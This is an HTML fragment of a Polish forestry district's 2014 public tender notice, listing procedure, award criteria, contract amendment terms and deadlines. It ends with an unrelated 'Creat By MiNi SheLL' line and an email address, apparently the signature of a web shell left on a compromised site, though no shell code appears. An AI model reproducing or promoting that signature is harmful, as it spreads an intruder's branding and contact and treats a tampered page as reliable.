</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy                             w stosunku do treści Oferty, na podstawie której dokonano wyboru Wykonawcy, jeżeli zajdzie      którykolwiek z niżej wymienionych warunków: 
    a) nastąpi, wywierająca bezpośredni wpływ na dalsze wykonywanie przedmiotu zamówienia,         zmiana obowiązującego prawa;
   b) w przypadku zaistnienia okoliczności (technicznych, gospodarczych, itp.), uniemożliwiających                realizację umowy na zasadach w niej określonych, których nie można było przewidzieć                             w chwili zawarcia umowy; 
    c) w przypadku wystąpienia zdarzeń siły wyższej jako zdarzenia zewnętrznego, niemożliwego                       do przewidzenia i niemożliwe do zapobieżenia, uniemożliwiające realizację umowy                                    na zasadach w niej określonych.  
2. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie,                   w formie aneksu do umowy, pod rygorem nieważności takiej zmiany. 
3. Zmiany zawartej umowy wymagają pisemnego uzasadnienia sporządzonego i podpisanego     przez przedstawicieli Zamawiającego oraz Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_wroclaw/nadl_ruszow/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Ruszów
ul. Leśna 2
59-950 Ruszów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.12.2014 godzina 12:00, miejsce: Nadleśnictwo Ruszów
ul. Leśna 2
59-950 Ruszów
Sekretariat - pokój nr 20.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com